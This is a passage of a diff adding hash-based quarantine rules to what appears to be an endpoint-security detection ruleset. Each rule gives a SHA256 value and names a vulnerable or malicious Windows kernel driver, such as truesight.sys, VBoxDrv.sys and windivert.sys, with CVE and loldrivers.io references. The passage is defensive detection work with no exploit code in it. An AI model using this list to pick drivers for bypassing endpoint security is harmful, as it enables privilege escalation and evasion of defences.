+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809063Z",
+ "creation_date": "2026-03-23T11:45:31.809065Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809071Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0213810e01cabf7f296d17d4bdd768a644ac5ed46ed03428c45fa986a0ece28e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e7ea4f9a-1560-50f9-9a13-0b54c0ad1e4e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155701Z",
+ "creation_date": "2026-03-23T11:45:31.155703Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155708Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d687eab6e49d5157a820ca9a4788a2cb594c8311a36d0f6b53330adbbd2ed10",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e7ea84e6-c805-5533-9402-7e040d02d78f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810380Z",
+ "creation_date": "2026-03-23T11:45:31.810382Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810387Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "63099e522e7971f91099d1d050e054399d21920b3d843b0553ea054d5488deb1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e7f9fd54-2ac6-53a8-8900-220e3a0f8acb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608138Z",
+ "creation_date": "2026-03-23T11:45:29.608140Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608145Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f4a442256f785969f8e1325bb98612da17528e76110bb8112cae78e3edcd547",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e810845b-3b8d-5846-ac21-20148bc42b6f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974069Z",
+ "creation_date": "2026-03-23T11:45:29.974092Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974098Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec5fac0b6bb267a2bd10fc80c8cca6718439d56e82e053d3ff799ce5f3475db5",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e811aeb0-5f41-5992-ba3a-e03f8322daa6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827311Z",
+ "creation_date": "2026-03-23T11:45:31.827313Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827319Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "697df9f2cbd118088a334949a493bb51f5fc6354aa62d61e4143a5d1debbd3c0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e8125746-588c-5e5f-b989-c965156d098a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143060Z",
+ "creation_date": "2026-03-23T11:45:32.143062Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143067Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f8812611cf7120e89e769cc908fabc0c9e49b27fded8dde6a3de51d9ce34f09",
+ "comment": "Vulnerable Kernel Driver (aka msr.sys) [https://www.loldrivers.io/drivers/ee6fa2de-d388-416c-862d-24385c152fad/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e81ffaaa-455f-5271-b5ea-0e77a57f8257",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830274Z",
+ "creation_date": "2026-03-23T11:45:31.830276Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830281Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "95bbc68071b6918824caee3737b1810ee48ac96940de4ff18dd237ea6aa36039",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e835c41b-1d2a-5ea6-98d8-4c5e4bb56e7d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621616Z",
+ "creation_date": "2026-03-23T11:45:29.621618Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621624Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7860e110f7a292d621006b7208a634504fb5be417fd71e219060381b9a891e6",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e849a909-7f91-548a-a58b-819972b77812",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144707Z",
+ "creation_date": "2026-03-23T11:45:32.144709Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144715Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8da085332782708d8767bcace5327a6ec7283c17cfb85e40b03cd2323a90ddc2",
+ "comment": "Malicious Kernel Driver (aka windivert.sys) [https://www.loldrivers.io/drivers/45a31a17-f78d-48ec-beba-74f6bfc5f96e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e84a8e81-2ed7-5760-b592-6e09412e23ae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478983Z",
+ "creation_date": "2026-03-23T11:45:31.478987Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478997Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "569b0bba367c867eb1236fe0a901dbebef28bf1ecd5c9a1191c6b8189e929937",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e864ad60-26d2-508a-8ce3-1a24485ee528",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808486Z",
+ "creation_date": "2026-03-23T11:45:31.808488Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808494Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "671f71f285dcbb8320d7516b52e0bc7842b0a218a0102a516780cb64715ab300",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e865fde4-baf7-54d8-a30e-9a46face5248",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159067Z",
+ "creation_date": "2026-03-23T11:45:31.159069Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159074Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff3f0bb2e78344e83dcddd3c7d327f2014724b0ded0c2c3f0de6bdfe8c134847",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e87baac3-a164-5029-82f1-a0e2f001d2ac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475159Z",
+ "creation_date": "2026-03-23T11:45:30.475162Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475171Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e",
+ "comment": "Vulnerable Kernel Driver (aka bs_rcio64.sys) [https://www.loldrivers.io/drivers/cacf18a5-6d7d-4a63-92d4-bda386a3da18/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e8973e79-e57d-5534-8f85-168cd87bbb18",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821183Z",
+ "creation_date": "2026-03-23T11:45:31.821186Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821195Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bf79ce5b627fa50bb6f20c54edc8cbfa258bd0614efd921976310cf1d395e80b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e898c861-d93c-5962-a9e4-9a570f592ff5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144147Z",
+ "creation_date": "2026-03-23T11:45:32.144149Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144154Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "44ebb0f534e7cdfec06d5234358d219798a313219b214d72aa23afc5a57d7ea9",
+ "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e8a348f0-0072-54cd-a187-ecbd9bfcda1f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611010Z",
+ "creation_date": "2026-03-23T11:45:29.611012Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611018Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "55e3b977402be076bfafe332a3fb29ddb6b02edf932d02e963df09adbe89eb91",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e8a79c99-57d0-55ec-9340-ab168040d4c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830385Z",
+ "creation_date": "2026-03-23T11:45:30.830387Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830393Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "87f8155a5a32e2623d124f29e7391bfb2971b8abe02786066917b950af70a0f9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e8aa54b9-d19b-588a-a0e9-35113f2afd58",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474580Z",
+ "creation_date": "2026-03-23T11:45:31.474585Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474596Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5e5dd268969e13f3af9bdb3c0e7b9a29746d3ae03adefe5457c1d96677395692",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e8be7a3f-aaa8-5389-9542-07d0d46cda35",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816678Z",
+ "creation_date": "2026-03-23T11:45:31.816682Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816691Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6594141aa7f1da404985aa30bb9b063624195dcd3068d73926ec7170d2ec9e82",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e8d4232a-8ca2-5610-ab44-ff9811a36c4d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483244Z",
+ "creation_date": "2026-03-23T11:45:31.483248Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483257Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "32d0ad55f7796709b8c48a94aa442f1d9b00d1352a5f211ad306be35f8b0c807",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e8da4589-d1f2-5eaf-b846-18d806d03117",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810485Z",
+ "creation_date": "2026-03-23T11:45:31.810487Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810493Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "78d1dfb77ee3705dfb820e03e6b035dbc67a85ffbffc889d92b3b8e9f9d123a3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e8ed23f2-7b84-5214-b2c8-fc17aef4df81",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453636Z",
+ "creation_date": "2026-03-23T11:45:30.453639Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
